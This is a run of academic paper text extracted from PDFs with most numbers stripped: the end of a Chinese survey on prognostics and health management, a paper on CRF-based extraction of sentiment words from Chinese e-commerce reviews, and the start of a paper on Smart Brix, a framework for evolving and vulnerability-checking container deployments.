the process of fault prediction is often uncertain. up to now, there is no general complex system in china. it is of great significance to our national defense industry and economic development. this paper summarizes the basic concepts, research connotation and basic research status of phm by drawing from foreign advanced experience and deeply studying the key technologies of phm. it mainly summarizes the main methods of phm architecture and fault prognostic. improve the specific technology, used in system development, will be the next major direction of research. acknowledgment this work is partially supported by science & technology program of shaanxi province with project “ gy- ” and “ ktcxsf- - ”, and the opening fund of state and local engineering laboratory of advanced network and monitoring control with project “gsysj ”. references [ ] hess a, fila l. the joint strike fighter (jsf) phm concept: potential impact on aging aircraft problems[c]. proceedings of ieee aerospace conference, big sky, montana, usa, , : - . [ ] keith m j, raymond r b. diagnostics to prognostics - a product availability technology evolution[c]. the rd annual reliability and maintainability symposium(rams ), orlando, fl, usa, : - . [ ] nishad p, diganta d, goebel k, et al. identification of failure precursor parameters for insulated gate bipolar transistors (igbts)[c]. international conference on prognostics and health manageme- nt(phm ), denver, co, usa, : - . [ ] han g t. prognostics and health management of avionics[j]. avionics technology, , ( ): - . [ ] zhang b zh. evolution and application of phm technology[j]. measurement & control technology, , ( ): - . [ ] andrew k s, lin d, banjevic d. a review on machinery diagnostics and prognostics implementing condition- based maintenance[j]. mechanical systems and signal processing, , : - . international conference on sensor network and computer engineering (icsnce ) [ ] xu p, kang r. research on prognostic and health management (phm) technology[j]. measurement and control technology, , ( ): - . [ ] michael g p.prognostics and health management of electronics[m]. john wiley & sons. inc., hoboken, new jersey, : - . [ ] andrew h, leo f. the joint strike fighter (jsf) phm concept: potential impact on aging aircraft problems[c], proceedings of ieee aerospace conference, big sky, montana, usa, , : - . [ ] pan q w, li t, li x sh. research on the architecture of prognostics and health management system[j]. journal of electronic measurement and instrument, (sup-pl.): - . [ ] hess a,calvello g,dabney t.[a].aerospace conference proceedings. ieee[c]. . [ ] araiza m l, kent r, espinosa r.[a]. autotestcon proceedings ieee〔c〕.oct. pages: 一 . [ ] su l p, nolan m, demare g, et al. [a]. autotestcon’ ieee systems readiness technology confer- ence [c]. . [ ] jay lee,fangji wu,wenyu zhao,masoud ghaffari,linxia liao,david siegel. prognostics and health manage-ment design for rotary machinery systems—reviews, methodology and applications[j]. mechanical systems and signal processing, , ( - ). [ ] lu bo, lu yuping, fang xigao. research on neural network dynamic inverse control of hypersonic vehi-cles[j]. computer measurement and control, , ( ): - : [ ] ma ning, lv chen. research on aircraft failure prediction and health management framework[ j]. journal of huazhong university of science and technology (science and technology), , (sup.): - . [ ] chang qi, yuan shenfang. aircraft integrated health management (ivhm) system technology status and development [j]. 
systems engineering and electronics, , ( ): - . [ ] hu changhua,xu hualong. control system fault diagnosis and fault-tolerant control analysis and design [m]. beijing: national defense industry press, . [ ] hardman w, hess a, blunt d, et al. a usn development strategy and demonstration results for propulsion and mechanical systems diagnostics, prognostics and health management[ a]. proceedings of the ieee ae-rospace conference[ c]. piscat-away: ieee inc., : - . [ ] lv chen. fault diagnosis and prediction technology - principles and applications [m]. [ ] beijing: beijing university of aeronautics and astronautics press, . [ ] liu zhen. research on intelligent bit diagnostic method and its application in multi-electric aircraft pow-er system [d]. xi'an: phd thesis of northwestern polytechnical university, . [ ] xu lijia. electronic system fault prediction and health management technology research [d]. chengdu: unv- ersity of electronic science and technology phd thesis, . [ ] liu xiaohui.study on rfid anti-collision algorithm based on binary number [d]. changchun: jilin university, . [ ] shuen chih tsai,yu-min hu,chen-hsun chai et al.efficient tag reading protocol for large-scale rfid syst- ems with rereading[j]. computer communications, , : - . [ ] g. eason, b. noble, and i. n. sneddon, “on certain integrals of lipschitz-hankel type involving products of bessel functions,” phil. trans. roy. soc. london, vol. a , pp. – , april . (references) [ ] zhang bo. research on anti-collision technology of cfd [d]. shanghai: donghua university, . [ ] g. eason, b. noble, and i. n. sneddon, “on certain integrals of lipschitz-hankel type involving products of bessel functions,” phil. trans. roy. soc. london, vol. a , pp. – , april . (references) [ ] michael g p. prognostics and health management of electronics[m]. john wiley & sons.inc., hoboken, new jersey, , - . [ ] vachtsevanos g, lewis f, roemer m, et al. intelligent fault diagnosis and prognosis for engineering systems[m]. john wiley & sons, inc, : - . [ ] adams d e. nonlinear damage models for diagnosis and prognosis in structural dynamic systems[c]. proceedings of spie conference, : - . [ ] chelidze d. multimode damage tracking and failure prognosis in eletromechanical system[c]. proceedings of spie conference, : - . [ ] ray a, tangirala s. stochastic modeling of fatigue crack dynamics for on-line failure prognostics[j]. ieee transactions on control systems technology, , ( ): - . [ ] li y, kurfess t r, liang s y.stochastic prognostics for rolling element bearings[j]. mechanical systems and signal processing, , : - . [ ] luo j, bixby a, pattipat i ,k,et al. an interacting multiple model approach to model-based prognostics[c]. in proceedings of ieee international conference on system, man and cybernetics, washington, dc, usa, ( ), - . [ ] lesieutre g a, fang l, lee u. hierarchical failure simulation for machinery prognostics[c]. a critical link: diagnosis to prognosis, virginia beach, virginia, usa, , - . [ ] fan j q, yao q w. nonlinear time series: nonpara-metric and parametric methods[m]. usa: springer, , - . 
paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) the extraction of comment information and sentiment analysis in chinese reviews li danyang school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com fan huimin school of computer science and engineering xi’an technological university xi’an, china e-mail: @ qq.com zhao yingze school of marxism xi'an jiaotong university xi’an, china e-mail: yingze @ .com abstract—sentiment analysis, also known as opinion mining, refers to the emotional tendencies expressed by the critics through the analysis of the content of the text. the task of text sentiment analysis mainly includes the classification of sentiment, the extraction of sentiment information and the retrieval and induction of sentiment information. based on crf, this paper will extract several pairs of theme words and sentiment words exist in the e-commerce review, and judge the sentiment inclination of the extracted sentiment words. the experimental results show that crf has a good effect on the extraction of emotional information. keywords-crf; extract theme words; extract sentiment words; sentiment analysis i. introduction with the rapid development of web . technology, there have been network reviews on the platform with exponential growth, such as micro-blog reviews, news commentaries and e-commerce reviews, etc. e-commerce is a business activity based on information network technology and centered on commodity exchange. with the diversification of consumer information in twenty-first century, the trading volume of e- commerce has increased rapidly. it has become an important part of the national economy and plays an extremely important role. for the e-commerce platform, the comment information greatly affects the consumer's purchase decision[ ]. by extracting the comment information in the chinese comment text, it can not only guide consumers to make rational consumption, but also help the merchants to improve the quality of the products. the comment information includes the theme words and sentiment words that appear in the commentary, the theme word refers to the evaluation object in the comment, which is the modification object of the sentiment word in the sentence, which is usually expressed as some attribute of the product. the extraction of comment information is one of the key tasks of text sentiment analysis, the existing methods for extracting information from reviews are mainly divided into rules/template and statistical methods. ii. extraction method of evaluation information the rule/template method is mainly based on the characteristics of the text itself, making the corresponding rules or templates to identify the specific field of evaluation objects. liu bing first proposed the problem of evaluation object extraction, he used the noun with high frequency as the evaluation object, and used the nearest adjective from the evaluation object as an sentiment word[ ]. according to the characteristics of chinese language, qiu yunfei and chen yifang put forward the method of extracting commodity evaluation objects by using word characteristics and syntactic analysis[ ]. however, the rule/template method requires domain experts to define the evaluation objects and rules in the corresponding field, so it cannot satisfy the emerging neologisms, and has no cross domain and portability, therefore, the most effective extraction method is based on the statistical method. 
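as a minimal illustration of this rule-based baseline (not from the paper), the sketch below extracts high-frequency nouns as candidate evaluation objects and pairs each with the nearest adjective in the same sentence as its sentiment word; the part-of-speech-tagged toy input, the tag names and the frequency threshold are illustrative assumptions.

from collections import Counter

# illustrative sketch of the rule/template baseline: frequent nouns become
# candidate evaluation objects, and the nearest adjective in the same
# sentence is taken as the associated sentiment word.
def extract_pairs(tagged_sentences, min_freq=2):
    noun_counts = Counter(w for sent in tagged_sentences
                          for w, pos in sent if pos == "n")
    candidates = {w for w, c in noun_counts.items() if c >= min_freq}
    pairs = []
    for sent in tagged_sentences:
        for i, (w, pos) in enumerate(sent):
            if pos == "n" and w in candidates:
                adjs = [(abs(i - j), aw) for j, (aw, apos) in enumerate(sent)
                        if apos == "a"]
                if adjs:
                    pairs.append((w, min(adjs)[1]))   # nearest adjective wins
    return pairs

# toy part-of-speech-tagged reviews ("n" = noun, "a" = adjective, "d" = adverb)
reviews = [[("screen", "n"), ("very", "d"), ("clear", "a")],
           [("screen", "n"), ("bright", "a")],
           [("price", "n"), ("high", "a")]]
print(extract_pairs(reviews))   # [('screen', 'clear'), ('screen', 'bright')]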
the statistical extraction method uses a trained statistical model to extract comment information. niklas jako et al. proposed the use of conditional random field model to extract the evaluation object, and model the extraction problem of the evaluation object into a sequence marking task[ ]. jin lijun and others have studied the method of automatic recognition based on svm[ ]. this paper mainly studies the application of crf statistical model in the extraction of comment information. iii. comment information extraction based on crf statistical model a. review information extraction process based on crf based on the statistical method, this paper uses the crf model as the main model and combines the constructed emotional dictionary to extract the comment information, as international conference on sensor network and computer engineering (icsnce ) shown in figure , it mainly includes building emotional lexicon, data preprocessing, part of speech tagging, training crf model, using crf model to extract theme words and sentiment words, judging the sentiment inclination of the extracted sentiment words and exporting final results. figure . review information extraction process based on crf b. data pretreatment data pretreatment is an essential part of text data mining. in this paper, it mainly includes the following parts: ) building a sentiment word dictionary: this paper will extend the sentiment dictionary for the use of the corpus. firstly, the new dictionary is applied to chinese word segmentation, which makes segmentation more accurate and largely avoids the destruction of the theme words and emotional words when they are segmenting. secondly, the new emotional dictionary is applied to the sentiment tendencies of sentiment words. ) chinese word segmentation: chinese word segmentation is the basis of text mining, but chinese is not as natural as english word, so chinese word segmentation is much more complicated than english word segmentation. in this paper, the more mature jieba segmentation algorithm combined with the new sentiment dictionary can be used to carry out chinese word segmentation, which is achieve a good segmentation effect. ) removing the stop words: the stop words are words that are completely useless or meaningless, such as auxiliary words, mood words, punctuation marks and so on. the removal of stop words can improve the efficiency of retrieval, save storage space, and exclude interference words. ) sequence labeling: in order to extract more accurate theme words and sentiment words, this paper divides the elements in the text into categories by using sequence labeling: the theme words is marked as t (theme), the sentiment word is marked as s (sentiment), and the rest of the words are labeled as o (other). the results of some of the data after the above pretreatment are shown in figure . figure . an example of data pretreatment results c. part of speech tagging crf model is actually transforming information extraction problem into sequence labeling problem. therefore, in order to train crf model, we need to process part of speech tagging of corpus in addition to three kinds of customized tags. part of speech is used to describe the function of a word in context. part of speech tagging is also called part-of-speech tagging, which refers to the process of marking a correct part of speech for every word in the word segmentation result. different languages have different set of part of speech tagging. in this paper, the annotation set of parsing tree is used. 
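to make the pretreatment steps described above concrete, the following sketch (not from the paper) segments a review with jieba, removes stop words, and assigns t/s/o labels from small example dictionaries; the dictionaries, the stop-word list and the exact segmentation output are illustrative assumptions.

import jieba

# illustrative pretreatment sketch: segmentation, stop-word removal and
# t/s/o sequence labeling against small example dictionaries.
stop_words = {"的", "了", "很"}                 # assumed stop-word list
theme_dict = {"屏幕", "电池"}                   # assumed theme (evaluation object) words
sentiment_dict = {"清晰", "差"}                 # assumed sentiment words

def preprocess(review):
    tokens = [t for t in jieba.lcut(review) if t not in stop_words]
    labels = ["T" if t in theme_dict else "S" if t in sentiment_dict else "O"
              for t in tokens]
    return list(zip(tokens, labels))

print(preprocess("屏幕很清晰，电池差"))
# e.g. [('屏幕', 'T'), ('清晰', 'S'), ('，', 'O'), ('电池', 'T'), ('差', 'S')]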
an excerpt of the data after part-of-speech tagging is shown in fig. . figure . an example of part of speech tagging. d. the introduction of crf conditional random fields[ ], crf or crfs for short, were first proposed by john lafferty in . they combine the characteristics of the maximum entropy model and the hidden markov model, and constitute a probabilistic undirected graph model. crfs are often used in sequence segmentation and tagging, and the conditional probability of the output nodes can be calculated given the input nodes. the crf model can better capture context information[ ], accurately identify key information, has been widely applied to many fields of natural language processing, and performs well in chinese natural language processing tasks such as part of speech tagging, machine translation, prosodic structure prediction and speech recognition. crf is an undirected graph model, and lafferty and others define a crf as follows: let g=(v,e) be an undirected graph, where v represents the set of nodes and e represents the set of edges; the elements of the tag sequence and the nodes in the graph correspond one to one. under the condition of a known observation sequence x, if the distribution of the random variables satisfies the markov property with respect to g, i.e., each node depends only on the nodes adjacent to it in g, then it is called a conditional random field. the formalized description of a crf is as follows: let g=(v, e) be an undirected graph, where v represents the set of vertices and e the set of edges. y={y_v | v∈v} indexes the vertices of g, that is, each vertex corresponds to a component y_v of the marked sequence, represented by a random variable. therefore, conditioned on x, the joint distribution associated with g has the form p(y_1, y_2, …, y_n | x), in which y is the marker sequence and x represents the observation sequence. if the random variable y satisfies the markov property with respect to g, that is $p(y_v \mid x, y_u, u \neq v) = p(y_v \mid x, y_u, u \sim v)$ ( ) where u~v indicates that u is adjacent to v in graph g, then (x, y) constitutes a conditional random field. in theory, if graph g represents the conditional dependence between the labeled sequences to be modeled, then its structure can be arbitrary. but when modeling the sequence annotation task, the simplest and most general graph structure is a simple first-order chain corresponding to the elements of y. this crf is generally called a linear-chain crf; the model of the linear-chain crf is shown in fig. , where x=(x_1, x_2, ..., x_n) is the observation sequence and y=(y_1, y_2, ..., y_n) is the output sequence. figure . structural representation of linear-chain crf.
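the estimation formulas for this model are given next; as a practical aside (not from the paper, which uses the crf++ toolkit), such a linear-chain crf tagger for the t/s/o labels above could be trained in python with the sklearn-crfsuite package as sketched below, with illustrative features and toy data.

import sklearn_crfsuite

# illustrative sketch: train a linear-chain crf that tags segmented words
# with t (theme word), s (sentiment word) or o (other).
def word_features(sent, i):
    w = sent[i]
    return {
        "word": w,
        "prev_word": sent[i - 1] if i > 0 else "<bos>",
        "next_word": sent[i + 1] if i < len(sent) - 1 else "<eos>",
    }

def sent_features(sent):
    return [word_features(sent, i) for i in range(len(sent))]

# toy training data (english tokens used only for readability):
# segmented review sentences and their t/s/o labels
sentences = [["screen", "very", "clear"], ["battery", "poor"]]
labels = [["T", "O", "S"], ["T", "S"]]

crf = sklearn_crfsuite.CRF(algorithm="lbfgs", c1=0.1, c2=0.1, max_iterations=100)
crf.fit([sent_features(s) for s in sentences], labels)
print(crf.predict([sent_features(["screen", "poor"])]))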
given the observation sequence, the conditional probability of the output sequence is as follows: $p(y \mid x) = \frac{1}{z(x)} \exp\Big(\sum_{i,k} \lambda_k t_k(y_{i-1}, y_i, x, i) + \sum_{i,k} \mu_k s_k(y_i, x, i)\Big)$ ( ) where $t_k(y_{i-1}, y_i, x, i)$ is a state transition function; $s_k(y_i, x, i)$ is a state feature function; $t_k$ and $s_k$ are both feature functions; $\lambda_k$ and $\mu_k$ are the weights of the feature functions, which are learned during training; and $z(x)$ is a normalization factor: $z(x) = \sum_{y} \exp\Big(\sum_{i,k} \lambda_k t_k(y_{i-1}, y_i, x, i) + \sum_{i,k} \mu_k s_k(y_i, x, i)\Big)$ ( ) as one of the most important undirected graph structures, the linear-chain crf has been applied in practical research, and most natural language processing research tasks use linear-chain crfs. iv. experimental results and analysis in the experiment, the data set of this paper, based on the data set provided by the big data & computing intelligence contest in , is divided into two parts: a training set and a test set. the crf model was trained on the training set; then the theme words and sentiment words were extracted from the test set, and the sentiment inclination of the extracted sentiment words was judged. in this paper, the f value is used as the evaluation index of the model. a. experimental evaluation index there are three main evaluation indexes commonly used in data mining and natural language processing: precision, recall and the f value. the precision is computed over the prediction results and indicates how many of the predicted positive samples are truly positive. the recall is computed over the original samples and indicates how many of the positive examples in the sample are predicted correctly. the f value is the harmonic mean of precision and recall. in a word, this paper uses the f value as the evaluation standard. in this paper, the calculation formulas are as follows: $p = \frac{\text{number of correctly extracted theme/sentiment words}}{\text{total number of extracted theme/sentiment words}}$ ( ) $r = \frac{\text{number of correctly extracted theme/sentiment words}}{\text{total number of theme/sentiment words in the data set}}$ ( ) $f = \frac{2 \times p \times r}{p + r}$ ( ) b. training the crf model the crf model is trained after the data set has been preprocessed by word segmentation, annotation and so on. this paper uses the open source tool crf++ to train the model; the feature template needs to be prepared before training, and the feature template file of this article is shown in fig. . figure . the feature template. the t in "t**:%x[#,#]" represents the template type, of which there are two altogether. the first is the unigram template, whose first character is u and which describes unigram features; the second is the bigram template, whose first character is b. the two "#" respectively represent the relative row offset and column offset, and each line of "%x[#,#]" generates a crf point (state) function f(s,o), where "s" is the label (output) at time t and "o" is the context at time t. the trained crf model contains the feature template, the feature dimension, the number of data sets, the characteristic functions and their weights; a series of information is output during the training process, and some of it is shown in fig. . the meaning of the parameter information is as follows: iter: the number of iterations. when the number of iterations reaches the maximum, the iteration is terminated. terr: tag error rate.
serr: sentence error rate. obj: the value of the current object. when the value converges to a definite value, the training is completed. diff: the relative difference between the value of the last object. when this value is lower than eta, the training is completed. figure . output file c. experimental results and analysis after extracting the theme words and sentiment words, the next step is the judgment of the sentiment inclination of the extracted sentiment words, and this step is much simpler. if the sentiment word belongs to the positive affective dictionary, the sentiment is positive. if it belongs to the negative sentiment dictionary, the sentiment is negative, otherwise it is neutral. the experimental results before and after the optimization dictionary are compared as shown in the table below. table is the experimental result of no emotional dictionary. table is the experimental result after optimization. figure . examples of no optimized results figure . examples of optimized results international conference on sensor network and computer engineering (icsnce ) in the above table, there are no definite theme words in some comments, but there are corresponding sentiment words. in this case, the theme word is marked as null. after comparison, it is found that after optimization, the recognition of the theme words is more accurate than before, and the accuracy rate is further improved. the next table is the comparison of the f values before and after the optimization. the comparison results from the table show that the f value of the optimized dictionary is about % higher than that before the optimization. table i. comparison of f before and after optimization data set f , comments . , comments . v. conclusion the accurate recognition of the theme words and sentiment words in the commentary is the key to the extraction of comment information and the basis for further analysis of the text[ ]. the extraction of comment information in chinese review is of great significance to both the merchant and the consumer. the merchant can adjust the goods according to the comment information or improve the quality of the product. the consumer can also make auxiliary decisions according to the comment information. in this paper, the crf statistical model is used to extract the theme words and sentiment words in the comment statement, and it is proved that the crf model is effective in identifying subject words and emotional words. in addition, this paper optimizes the emotional dictionary, which combines data sets and cnki's emotional lexicon to build an new emotional dictionary that is more suitable for this paper. the experimental results show that the optimization dictionary makes the recognition of the theme words and sentiment words more accurate, and the f value is further improved. of course, in addition to the crf model used in this paper, there are other methods that can also extract comment information, such as lda theme model, dependency parsing method and so on. besides, there are still some shortcomings in this paper. chinese expression is much richer than english, in chinese, there are some irony and even the use of network language statements can not accurately identify theme words and sentiment words, so we need further study of chinese semantics and so on. references [ ] li piji, ma jun, zhang dongmei, etc.. “label extraction and sorting in user reviews,” j. journal of chinese information processing, , vol. ( ), pp. - , . [ ] hu mq, liu b. 
“mining and summarizing customer reviews,” c.proc. of the th acm sigkdd international conference on knowledge discovery and data mining. seattle, wa, usa. , pp. – . [ ] qiu yunfei, chen yifang, wang wei, etc.. “product evaluation object extraction based on word character and syntactic analysis,” j. computer engineering, , vol. ( ), pp. - . [ ] jakob n, gurevych i. “extracting opinion targets in a single-and cross-domain setting with conditional random fields,” proc. of the conference on empirical methods in natural language processing. cambridge, massachusetts. . [ ] jin lijun. “research on the automatic recognition of the usefulness of svm based search commodity reviews,” d. harbin institute of technology, . [ ] john d lafferty, andrew mccallum, fernando c n pereira. “conditional random fields: probabilistic models for segmenting and labeling sequence data,” proceedings of the th international conference on machine learning. williamstown, ma, usa, , pp. - . [ ] wang rongyang, ju jiupeng, li shoushan, etc.. “research on feature extraction feature of evaluation object based on crfs,” j. journal of chinese information processing, , vol. ( ), pp. - . [ ] xia yuan, zhang zheng . “evaluation of object extraction based on crf,” j. computer systemsand applications. , vol. ( ), pp. - . submitted march accepted may published june corresponding author johannes m. schleicher, schleicher@dsg.tuwien.ac.at academic editor elisabetta di nitto additional information and declarations can be found on page doi . /peerj-cs. copyright schleicher et al. distributed under creative commons cc-by . open access smart brix—a continuous evolution framework for container application deployments johannes m. schleicher , michael vögler , christian inzinger and schahram dustdar distributed systems group, tu wien, vienna, austria s.e.a.l—software evolution & architecture lab, university of zürich, zürich, switzerland abstract container-based application deployments have received significant attention in recent years. operating system virtualization based on containers as a mechanism to deploy and manage complex, large-scale software systems has become a popular mechanism for application deployment and operation. packaging application components into self- contained artifacts has brought substantial flexibility to developers and operation teams alike. however, this flexibility comes at a price. practitioners need to respect numerous constraints ranging from security and compliance requirements, to specific regulatory conditions. fulfilling these requirements is especially challenging in specialized domains with large numbers of stakeholders. moreover, the rapidly growing number of container images to be managed due to the introduction of new or updated applications and respective components, leads to significant challenges for container management and adaptation. in this paper, we introduce smart brix, a framework for continuous evolution of container application deployments that tackles these challenges. smart brix integrates and unifies concepts of continuous integration, runtime monitoring, and operational analytics. furthermore, it allows practitioners to define generic analytics and compensation pipelines composed of self-assembling processing components to autonomously validate and verify containers to be deployed. we illustrate the feasibility of our approach by evaluating our framework using a case study from the smart city domain. 
we show that smart brix is horizontally scalable and runtime of the implemented analysis and compensation pipelines scales linearly with the number of container application packages. subjects adaptive and self-organizing systems, distributed and parallel computing, software engineering keywords containers, container evolution, container adaptation, devops, infrastructure as code introduction in recent years, we have seen widespread uptake of operating system virtualization based on containers (soltesz et al., ) as a mechanism to deploy and manage complex, large-scale software systems. using containers, developers create self-contained images of application components along with all dependencies that are then executed in isolation on top of a container runtime (e.g., docker: https://www.docker.com/, rkt: https://github.com/coreos/rkt, or triton: https://www.joyent.com/). by packaging how to cite this article schleicher et al. ( ), smart brix—a continuous evolution framework for container application deployments. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:schleicher@dsg.tuwien.ac.at https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://www.docker.com/ https://github.com/coreos/rkt https://www.joyent.com/ http://dx.doi.org/ . /peerj-cs. application components into self-contained artifacts, developers can ensure that the same artifact is consistently used throughout the complete software release process, from initial testing to the final production deployment. this mechanism for application deployment has become especially popular with practitioners executing projects following devops (hüttermann, ) principles. based on the convergence of development and operations, devops advocates a high degree of automation throughout the software development lifecycle (e.g., to implement continuous delivery (humble & farley, )), along with an associated focus on deterministic creation, verification, and deployment of application artifacts using infrastructure as code (iac) (nelson-smith, ) techniques, such as dock- erfiles (https://docs.docker.com/engine/reference/builder/) for containerized applications. these properties allow for straightforward implementation of immutable infrastructure deployments, as advocated by iac approaches. application container images are usually created using a layered structure so that common base functionality can be reused by multiple container images. application-specific artifacts are layered on top of a base file system so that for subsequent updates only the modified layers need to be transferred among different deployment environments. container engine vendors such as docker and coreos provide public repositories where practitioners can share and consume container images, both base images for common linux distributions (e.g., ubuntu, coreos, centos, or alpine) to subsequently add custom functionality, as well as prepared application images that can be directly used in a container deployment. once uploaded to a repository, a container image is assigned a unique, immutable identifier that can subsequently be used to deterministically deploy the exact same application artifact throughout multiple deployment stages. 
by deploying each application component in its own container (https://docs.docker.com/engine/articles/dockerfile_best-practices/), practitioners can reliably execute multiple component versions on the same machine without introducing conflicts, as each component is executed in an isolated container. however, since each container image must contain every runtime dependency of the packaged application component, each of these dependency sets must be maintained separately. this leads to several challenges for practitioners. over time, the number of active container images grows due to the introduction of new applications, new application components, and updates to existing applications and their components. this growing number of container images inherently leads to a fragmentation of deployed runtime dependencies, making it difficult for operators to ensure that every deployed container continues to adhere to all relevant security, compliance, and regulatory requirements. whenever, for instance, a severe vulnerability is found in a common runtime dependency, practitioners either have to manually determine if any active container images are affected, or initiate a costly rebuild of all active containers, irrespective of the actual occurrence of the vulnerability. we argue that practitioners need a largely automated way to perform arbitrary analyses on all container images in their deployment infrastructure. furthermore, a mechanism is required that allows for the enactment of customizable corrective actions on containers that fail to pass the performed analyses. finally, in order to allow practitioners to deal with the possibly large number of container images, the overall approach should be able to adapt it’s deployment to scale out horizontally. schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://docs.docker.com/engine/reference/builder/ https://docs.docker.com/engine/articles/dockerfile_best-practices/ http://dx.doi.org/ . /peerj-cs. in this paper, we present smart brix, a framework for continuous evolution of container applications. smart brix integrates and unifies concepts of continuous integration, runtime monitoring, and operational analytics systems. practitioners are able to define generic analytics and compensation pipelines composed of self-assembling processing components to autonomously validate and verify containers to be deployed. the framework supports both, traditional mechanisms such as integration tests, as well as custom, business-relevant processes, e.g., to implement security or compliance checks. smart brix not only manages the initial deployment of application containers, but is also designed to continuously monitor the complete application deployment topology to allow for timely reactions to changes (e.g., in regulatory frameworks or discovered application vulnerabilities). to enact such reactions to changes in the application environment, developers define analytics and compensation pipelines that will autonomously mitigate problems if possible, but are designed with an escalation mechanism that will eventually request human intervention if automated implementation of a change is not possible. to illustrate the feasibility of our approach we evaluate the smart brix framework using a case study from the smart city domain. 
we show that the runtime of the implemented analysis and compensation pipelines scales linearly with the number of analyzed application packages, and that it adds little overhead compared to container acquisition times. the remainder of this paper is structured as follows. in ‘motivation’ we present a motivating scenario and relevant design goals for our framework. we present the smart brix framework in ‘the smart brix framework,’ along with a detailed discussion of the framework components. in ‘evaluation’ we evaluate our approach using a case study from the smart city domain. related work is discussed in ‘related work’, followed by a conclusion and outlook for further research in ‘conclusion.’ motivation in this paper, we base our discussion on a scenario containing a multi-domain expert network as created within urbem (http://urbem.tuwien.ac.at), a research initiative of the city of vienna and tu wien. to tackle the emerging complexities that arise in the smart city domain, we introduced a novel smart city loop (schleicher et al., b), which is depicted in fig. . this loop outlines a reactive system that enables stakeholders to make informed decisions based on the models and analyses of interdisciplinary domain experts who in turn can access the large amounts of data provided by smart cities. in urbem, a network consists of experts in the domains of energy, mobility, mathematics, building physics, sociology, as well as urban and regional planning. urbem aims to provide decision support for industry stakeholders to plan for the future of the city of vienna and represents a distributed analytical environment (dae) (schleicher et al., c). the experts in this scenario rely on a multitude of different models and analytical approaches to make informed decisions based on the massive amounts of data that are available about the city. in turn, these models rely on a plethora of different tools and environments that lead to complex requirements in terms of providing the right runtime environment for them to operate. the used tools range from modern systems for data analytics and stream processing like cassandra and spark, to proprietary tools schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://urbem.tuwien.ac.at http://dx.doi.org/ . /peerj-cs. figure smart city loop. developed by companies and research institutes with a large variance in specific versions and requirements to run them. additionally, these domains have to deal with a broad range of different stakeholders and their specific security and compliance requirements. models sometimes need to tailor their runtime environment to specific technology stacks to ensure compliance or to be able to access the data they need. managing and satisfying all these requirements is a non-trivial task and a significant factor hindering broader adoption. therefore, this environment offers an optimal case for the advantages that come with the use of container-based approaches. operations teams that need to integrate these models no longer need to be concerned with runtime specifics. experts simply build containers that can be deployed in the heterogenous infrastructures of participating stakeholders. however, several challenges remain. in urbem the team of experts with their plethora of different models created over different images that serve as the foundation for running containers. the models in these containers are fueled by data from several different schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com http://dx.doi.org/ . /peerj-cs. stakeholders in the scenario, ranging from research institutions in the city of vienna to industry stakeholders in the energy and mobility domain. each of them mandates a very distinct set of security and compliance requirements that need to be met in order to run them. these requirements in turn are subject to frequent changes and the containers need to be able to evolve along with them. additionally, even though the container approach provides isolation from the host system it is still vital to ensure that the containers themselves are not compromised. this calls for means to check the systems running inside the container for known vulnerabilities, an issue that is subject to heavy and fast-paced change, again requiring according evolution. a recent study (http://www.banyanops.com/blog/analyzing- docker-hub/) shows that in the case of docker, depending on the version of the images, more than % of the images show potential vulnerabilities, with over % of them being severe. this also begs the question of who is responsible for checking and fixing these vulnerabilities, the operations team or the experts who created them? despite these security and compliance constraints, the ever-changing smart city domain itself makes it necessary for experts to stay on top of the novel toolsets that emerge in order to handle requirements stemming from topics like big data or iot. this leads to a rapid creation and adaptation of models and their according containers, which in turn need be checked against these constraints again. last but not least, these containers need to comply to certain non-functional requirements that arise from the specific situations they are applied in. this calls for the ability to constantly check containers against certain runtime metrics that need to be met in order to ensure that these systems are able to deliver their excepted results within stakeholder-specific time and resource constraints. all these factors lead to a complex environment that calls for an ability to easily adapt and evolve containers to their ever-changing requirements. specifically, we identify the following requirements in the context of our domain: • the ability to check a large amount of heterogenous containers against an open set of evolving requirements. these requirements can be vulnerabilities, compliance constraints, functional tests, or any other metric of interest for the domain. • the ability to mitigate issues and evolve these containers based on the results from the previously mentioned checks. • an approach that is applicable in the context of operations management, while still enabling the participation of experts both for checking as well as evolution. • an approach that can be applied to existing deployments as well as utilized to test new ones. the smart brix framework in this section, we introduce the smart brix framework for continuos evolution of container-based deployments, which addresses the previously introduced requirements. we start with a framework overview, followed by a detailed description of all framework elements, and conclude with a comprehensive description of our proof of concept implementation including possible deployment variants. schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.banyanops.com/blog/analyzing-docker-hub/ http://www.banyanops.com/blog/analyzing-docker-hub/ http://dx.doi.org/ . /peerj-cs. figure smart brix framework overview. 
framework rationales the smart brix framework follows the microservice (newman, ) architecture paradigm and an overview of the main framework components is shown in fig. . the framework is logically organized into four main facets, which group areas of responsibility. each of these facets is composed of multiple components where each of these components represents a microservice. the components in the analyzer and compensation facet are managed as self- assembling omponents (http://techblog.netflix.com/ / /building-netflix-playback- with-self.html), an approach we already successfully applied in previous work (schleicher et al., a). each of these components follows the command pattern (gamma et al., ) and consists of multiple processors that are able to accept multiple inputs and produce exactly one output. this functional approach enables a clean separation of concerns and allows us to decompose complex problems into manageable units. figure illustrates an example of auto-assembly within the analyzer facet. we see a set of processors, where each processor is waiting for a specific type of input and clearly specifies the output it produces. the processors use a message-oriented approach to exchange input and output data, where each output and input is persistently available in the message queue and accessible by any processor. in this example we perform an analysis of a custom-built debian-based container that hosts the apache httpd server. there are two potential processors for the input artifact, each of them able to handle a different container format. since in our example the artifact is a docker container, only the docker analyzer reacts and produces as output a docker image. in the next step there are two active processors, the docker base image analyzer and the docker package system analyzer, both taking docker images as input. since the docker base image analyzer cannot determine a base image for the given docker image, it produces no output. however, the docker package system analyzer is able to determine that the image uses a dpkg-based package system and produces the according output. now the dpkg package analyzer reacts by taking two inputs, the original artifact as well as the dpkg output and inspects the artifact via the schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://techblog.netflix.com/ / /building-netflix-playback-with-self.html http://techblog.netflix.com/ / /building-netflix-playback-with-self.html http://dx.doi.org/ . /peerj-cs. figure example of auto assembling processors within the 